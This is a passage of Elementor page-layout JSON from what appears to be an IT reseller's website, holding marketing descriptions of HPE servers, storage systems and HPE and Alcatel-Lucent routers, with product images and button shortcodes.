workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"40400cb\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b8fcbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2855b1a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"678fabe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fa51356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fc8f82c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4c8fa09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23f429a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f63f973\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ef27847\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8df486\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d2666d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"96abc95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f088196\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c202494\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p 